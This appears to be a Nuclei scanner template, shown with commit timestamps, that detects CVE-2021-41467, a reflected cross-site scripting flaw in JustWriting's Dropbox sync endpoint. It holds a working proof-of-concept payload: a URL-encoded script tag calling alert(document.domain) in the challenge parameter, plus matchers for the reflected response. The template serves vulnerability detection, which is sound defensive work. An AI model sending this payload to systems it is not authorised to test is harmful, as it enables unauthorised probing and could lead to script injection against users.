nuclei-templates/http/cves/2021/CVE-2021-41467.yaml

43 lines
1.2 KiB
YAML
Raw Normal View History

2021-10-06 07:11:01 +00:00
id: CVE-2021-41467
info:
name: JustWriting - Cross-Site Scripting
2021-10-06 18:25:26 +00:00
author: madrobot
2021-10-06 07:11:01 +00:00
severity: medium
description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.
2021-10-06 07:11:01 +00:00
reference:
- https://github.com/hjue/JustWriting/issues/106
- https://nvd.nist.gov/vuln/detail/CVE-2021-41467
- https://github.com/hjue/JustWriting/
2021-10-06 07:11:01 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2021-10-06 07:11:01 +00:00
cve-id: CVE-2021-41467
cwe-id: CWE-79
cpe: cpe:2.3:a:justwriting_project:justwriting:*:*:*:*:*:*:*:*
epss-score: 0.00125
2021-10-06 18:25:26 +00:00
tags: cve,cve2021,justwriting,xss
metadata:
max-request: 1
2021-10-06 18:25:26 +00:00
http:
2021-10-06 07:11:01 +00:00
- method: GET
path:
2021-10-06 18:25:26 +00:00
- '{{BaseURL}}/sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-10-06 07:11:01 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
2021-10-06 18:25:26 +00:00
- "</script><script>alert(document.domain)</script>"
2021-10-06 07:11:01 +00:00
part: body
- type: word
words:
- "text/html"
part: header